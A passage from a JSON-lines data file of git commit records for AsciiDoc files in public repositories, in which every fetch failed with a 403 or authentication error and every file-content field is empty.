2019-02-10-RTFM-Episode-0x01.adoc","repos":"kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io,kr-b\/kr-b.github.io","old_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_file":"_posts\/2019-02-10-RTFM-Episode-0x01.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kr-b\/kr-b.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"87f7783455f11657dbd8bdedd760e11526ac3d1f","subject":"lots of cleanup","message":"lots of cleanup\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4262936acf02d240caaab29e6ab97c3814922df8","subject":"Fix two typos","message":"Fix two typos","repos":"clojure\/clojure-site","old_file":"content\/guides\/spec.adoc","new_file":"content\/guides\/spec.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"532bde5dce7d041160552312a510c9129fcceca1","subject":"sync up tools list","message":"sync up tools list\n","repos":"clojure\/clojurescript-site","old_file":"content\/tools\/tools.adoc","new_file":"content\/tools\/tools.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"ca8a74abc8c9d9d4eaaeb005c9762a5df12d811e","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a14e75b2375004ed540bdc9356dc0a2133a41dd7","subject":"Start blogpost.","message":"Start blogpost.\n","repos":"stuartwdouglas\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,ctomc\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,luck3y\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,stuartwdouglas\/wildfly.org,rhusar\/wildfly.org,adrianoschmidt\/wildfly.org,ctomc\/wildfly.org,adrianoschmidt\/wildfly.org","old_file":"news\/2015-05-05-WildFly-Swarm-Released.adoc","new_file":"news\/2015-05-05-WildFly-Swarm-Released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/wildfly.org.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31beaad7fb01fa1ace1a18af0d1126a255d6d940","subject":"Update Asciidoctor.adoc","message":"Update Asciidoctor.adoc","repos":"smru\/Documentation,smru\/Documentation","old_file":"Linux\/Asciidoctor.adoc","new_file":"Linux\/Asciidoctor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/smru\/Documentation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee77e880a416abebd6956150f020a1ec5f508a44","subject":"y2b create post Duke Nukem Giveaway - UPDATE!","message":"y2b create post Duke Nukem Giveaway - 
UPDATE!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-05-Duke-Nukem-Giveaway--UPDATE.adoc","new_file":"_posts\/2011-07-05-Duke-Nukem-Giveaway--UPDATE.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"164adae1acf4b0fcb29a8147560d22f67ed18a03","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6630ae1d4bc305bdd58d743292e20fa53a1f3649","subject":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","message":"Update 2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_file":"_posts\/2016-06-09-I-Phone-A-P-Pin-Philippines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49c7e4381240443de4d362e8db232f5546e55686","subject":"Update 2016-10-05-11092015-Prototype-Createur.adoc","message":"Update 2016-10-05-11092015-Prototype-Createur.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-05-11092015-Prototype-Createur.adoc","new_file":"_posts\/2016-10-05-11092015-Prototype-Createur.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"203a079e14d3f1a85edab0a602152b9c3705cdca","subject":"Update 2014-10-25-My-first-week.adoc","message":"Update 2014-10-25-My-first-week.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2014-10-25-My-first-week.adoc","new_file":"_posts\/2014-10-25-My-first-week.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"511bba0c7abee21c8ec8b241258c9fc96901b9ca","subject":"Changed ContentMode Package in Label doc","message":"Changed ContentMode Package in Label 
doc","repos":"mstahv\/framework,Darsstar\/framework,Darsstar\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,mstahv\/framework,mstahv\/framework,asashour\/framework,asashour\/framework,Darsstar\/framework,asashour\/framework,Darsstar\/framework,Darsstar\/framework","old_file":"documentation\/components\/components-label.asciidoc","new_file":"documentation\/components\/components-label.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mstahv\/framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5461d47b8721d03bb6a69a9aa2f7a78e03835a56","subject":"Update 2018-11-28-vr-programing.adoc","message":"Update 2018-11-28-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-28-vr-programing.adoc","new_file":"_posts\/2018-11-28-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"427dfc61ace9cbc42ac8b7960e84249fef836315","subject":"Added addons addon docs","message":"Added addons addon docs\n","repos":"oscerd\/core,pplatek\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,jerr\/jbossforge-core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,oscerd\/core,ivannov\/core,D9110\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,pplatek\/core,forge\/core,D9110\/core,agoncal\/core,ivannov\/core,ivannov\/core,ivannov\/core,D9110\/core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,D9110\/core,pplatek\/core,agoncal\/core,agoncal\/core,oscerd\/core,agoncal\/core,agoncal\/core,ivannov\/core,forge\/core,jerr\/jbossforge-core,ivannov\/core,D9110\/core,forge\/core,pplatek\/core,ivannov\/core,agoncal\/core,D9110\/core,oscerd\/core,forge\/core,agoncal\/core,oscerd\/core,oscerd\/core,forge\/core,agoncal\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,forge\/core,forge\/core,ivannov\/core,D9110\/core,oscerd\/core,stalep\/forge-core,pplatek\/core,pplatek\/core,ivannov\/core,pplatek\/core,oscerd\/core,pplatek\/core,stalep\/forge-core,forge\/core,ivannov\/core,jerr\/jbossforge-core","old_file":"addons\/README.asciidoc","new_file":"addons\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"3d94e33f9855f96e77e8daec3b7eaa01413ff1e9","subject":"Update 2017-08-22.adoc","message":"Update 2017-08-22.adoc","repos":"SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io,SRTjiawei\/SRTjiawei.github.io","old_file":"_posts\/2017-08-22.adoc","new_file":"_posts\/2017-08-22.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SRTjiawei\/SRTjiawei.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5b73a33abfc9481bfbb137cc38089c795d747a29","subject":"Update 2015-04-15-Development-environment.adoc","message":"Update 
2015-04-15-Development-environment.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-04-15-Development-environment.adoc","new_file":"_posts\/2015-04-15-Development-environment.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f1b8556ce5c8762c56625d9c70fb021d934aaf4","subject":"Update 2017-03-14-instalando-nativescript.adoc","message":"Update 2017-03-14-instalando-nativescript.adoc","repos":"NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io,NativeScriptBrasil\/nativescriptbrasil.github.io","old_file":"_posts\/2017-03-14-instalando-nativescript.adoc","new_file":"_posts\/2017-03-14-instalando-nativescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/NativeScriptBrasil\/nativescriptbrasil.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be892aa2a662edd8d752782a5bc9ff65c59fc2a2","subject":"Update 2015-09-02-title.adoc","message":"Update 2015-09-02-title.adoc","repos":"xmichaelx\/xmichaelx.github.io,xmichaelx\/xmichaelx.github.io","old_file":"_posts\/2015-09-02-title.adoc","new_file":"_posts\/2015-09-02-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xmichaelx\/xmichaelx.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea04eb7090bad3cc2811ab764df4ca15c309559c","subject":"Update 2017-08-05-mecab.adoc","message":"Update 2017-08-05-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-05-mecab.adoc","new_file":"_posts\/2017-08-05-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f29da4212a226df2368c2182a8929a577705e847","subject":"y2b create post The Ultimate Gaming PC - Custom Gaming PC Build (UGPC 2012)","message":"y2b create post The Ultimate Gaming PC - Custom Gaming PC Build (UGPC 2012)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-12-10-The-Ultimate-Gaming-PC--Custom-Gaming-PC-Build-UGPC-2012.adoc","new_file":"_posts\/2012-12-10-The-Ultimate-Gaming-PC--Custom-Gaming-PC-Build-UGPC-2012.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c57675a91e6cb133d266b924ba6e309871436b41","subject":"HWKMETRICS-239: Fix space issue in the ReadMe which was edited online. The checkstyle should pass now.","message":"HWKMETRICS-239: Fix space issue in the ReadMe which was edited online. 
The checkstyle should pass now.\n","repos":"mwringe\/hawkular-metrics,hawkular\/hawkular-metrics,pilhuhn\/rhq-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,spadgett\/hawkular-metrics,hawkular\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,mwringe\/hawkular-metrics,ppalaga\/hawkular-metrics,burmanm\/hawkular-metrics,pilhuhn\/rhq-metrics,tsegismont\/hawkular-metrics,pilhuhn\/rhq-metrics,burmanm\/hawkular-metrics,tsegismont\/hawkular-metrics,jotak\/hawkular-metrics,hawkular\/hawkular-metrics,burmanm\/hawkular-metrics,mwringe\/hawkular-metrics,spadgett\/hawkular-metrics,pilhuhn\/rhq-metrics,hawkular\/hawkular-metrics,jotak\/hawkular-metrics,jotak\/hawkular-metrics,ppalaga\/hawkular-metrics,tsegismont\/hawkular-metrics,burmanm\/hawkular-metrics,spadgett\/hawkular-metrics,ppalaga\/hawkular-metrics,spadgett\/hawkular-metrics","old_file":"containers\/README.adoc","new_file":"containers\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/burmanm\/hawkular-metrics.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dd176cf8baaaaa26018fb895925c3525c25c5ca1","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/fourth.adoc","new_file":"content\/writings\/fourth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"477d1ce1010e5421a957ac5b5f164f53e5a6370d","subject":"Renamed '_posts\/About-Me.adoc' to '_posts\/about-me.adoc'","message":"Renamed '_posts\/About-Me.adoc' to '_posts\/about-me.adoc'","repos":"rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io,rorosaurus\/hubpress.io","old_file":"_posts\/about-me.adoc","new_file":"_posts\/about-me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rorosaurus\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"962ae069b4452a43077e1450c391225060192e41","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8c70600ee3e470cdfc1441cb1ba69eb562fdb12d","subject":"Update 2017-07-21-Friday.adoc","message":"Update 2017-07-21-Friday.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-07-21-Friday.adoc","new_file":"_posts\/2017-07-21-Friday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c25eb3a885d39c43e684122d64feec4de803ea6","subject":"Update 
2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","message":"Update 2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_file":"_posts\/2017-01-12-Quick-Tips-1-Centralizando-Elementos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a37379e04b55680e60b6063140ef6a943acc000","subject":"Update 2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","message":"Update 2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","repos":"setupminimal\/blog,setupminimal\/blog,setupminimal\/blog,setupminimal\/blog","old_file":"_posts\/2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","new_file":"_posts\/2017-02-06-Pointers-to-Pointers-to-Pointers-to.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/setupminimal\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36f82e252b0d593cdda4c5239173c49bec3a5369","subject":"y2b create post Duke Nukem Forever Balls of Steel Edition Unboxing","message":"y2b create post Duke Nukem Forever Balls of Steel Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-14-Duke-Nukem-Forever-Balls-of-Steel-Edition-Unboxing.adoc","new_file":"_posts\/2011-06-14-Duke-Nukem-Forever-Balls-of-Steel-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"32fcfdaa1e8ca30da18f49428d2aead2fcbf5627","subject":"Update 2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","message":"Update 2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","repos":"fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io,fuhrerscene\/fuhrerscene.github.io","old_file":"_posts\/2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","new_file":"_posts\/2017-11-01-Fear-Factorys-song-Cyberwaste-perfect-but-one-word.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fuhrerscene\/fuhrerscene.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"510524969869520e53e5fbf6daa1de8a1a978548","subject":"004 README","message":"004 README\n","repos":"edusantana\/udc-texts-to-compare-asciidoc-toolchains","old_file":"udc\/004\/README.asciidoc","new_file":"udc\/004\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/edusantana\/udc-texts-to-compare-asciidoc-toolchains.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d58f7405c69c4a7f4880d0cb974e0c4ffb1d62fe","subject":"Update 2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","message":"Update 
2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","repos":"fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io,fauzanooor\/fauzanooor.github.io","old_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_file":"_posts\/2003-03-03-Install-Zimbra-Mail-Server-87-OSE-on-Red-Hat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fauzanooor\/fauzanooor.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30512d58c91b6c3d71c462ae2c5ad58236ac2358","subject":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","message":"Update 2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_file":"_posts\/2018-08-15-Looking-at-randomness-and-performance-for-hash-codes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06cf66c5f08d9c37c86a934e2e1116014f097df1","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"remote: Support for password authentication was removed on August 13, 2021.\nremote: Please see https:\/\/docs.github.com\/en\/get-started\/getting-started-with-git\/about-remote-repositories#cloning-with-https-urls for information on currently recommended modes of authentication.\nfatal: Authentication failed for 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/'\n","license":"mit","lang":"AsciiDoc"} {"commit":"0964da03bca1e9dacc24b313e3b55924b13a9f36","subject":"y2b create post Logitech Performance Mouse MX Unboxing \\u0026 Overview","message":"y2b create post Logitech Performance Mouse MX Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-06-24-Logitech-Performance-Mouse-MX-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-06-24-Logitech-Performance-Mouse-MX-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0926036d229292e0fddbf35f6963e03fca492d94","subject":"y2b create post The Best Headphones That Money Can Buy...","message":"y2b create post The Best Headphones That Money Can 
Buy...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-13-The%20Best%20Headphones%20That%20Money%20Can%20Buy....adoc","new_file":"_posts\/2018-01-13-The%20Best%20Headphones%20That%20Money%20Can%20Buy....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"81852ab742e990ff2aa65c35d03f35e0ae9a0171","subject":"Update 2015-06-05-Ma-journee-au-web2day.adoc","message":"Update 2015-06-05-Ma-journee-au-web2day.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_file":"_posts\/2015-06-05-Ma-journee-au-web2day.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b74e7a7f52f87be717421e0a27b45d939c80264e","subject":"updated cluster scaling readme","message":"updated cluster scaling readme\n","repos":"arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop","old_file":"cluster-scaling\/readme.adoc","new_file":"cluster-scaling\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ad14962dceede1a3ff2036b12561307b94eae383","subject":"start sample queries","message":"start sample queries\n","repos":"ridgebacknet\/ridgeback-hunter-db","old_file":"sample-queries.adoc","new_file":"sample-queries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ridgebacknet\/ridgeback-hunter-db.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e6b7940e123655c8efa696c55c31fa69fa491c05","subject":"Added development environment documentation","message":"Added development environment documentation\n","repos":"lefou\/blended,woq-blended\/blended,woq-blended\/blended,lefou\/blended","old_file":"doc\/Development.adoc","new_file":"doc\/Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lefou\/blended.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"def46153a9e5fa4f24666366d639a99717b5ac3c","subject":"Update 2015-05-11-Flashing-Nexus-9-flounder.adoc","message":"Update 2015-05-11-Flashing-Nexus-9-flounder.adoc","repos":"hapee\/hapee.github.io,hapee\/hapee.github.io,hapee\/hapee.github.io","old_file":"_posts\/2015-05-11-Flashing-Nexus-9-flounder.adoc","new_file":"_posts\/2015-05-11-Flashing-Nexus-9-flounder.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hapee\/hapee.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9efae0806cd7a448a978830a36bd2856b0bd87db","subject":"Update 2015-06-10-Por-que-debes-usar-github.adoc","message":"Update 2015-06-10-Por-que-debes-usar-github.adoc","repos":"nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io,nectia-think\/nectia-think.github.io","old_file":"_posts\/2015-06-10-Por-que-debes-usar-github.adoc","new_file":"_posts\/2015-06-10-Por-que-debes-usar-github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nectia-think\/nectia-think.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cdc4e6a1ab73adea3193ffc4ca1cf67f0a003bff","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75cdef63199864b8a43f48138b1fd3ffc6385898","subject":"Update 2016-05-03-The-Final-Blog-Post.adoc","message":"Update 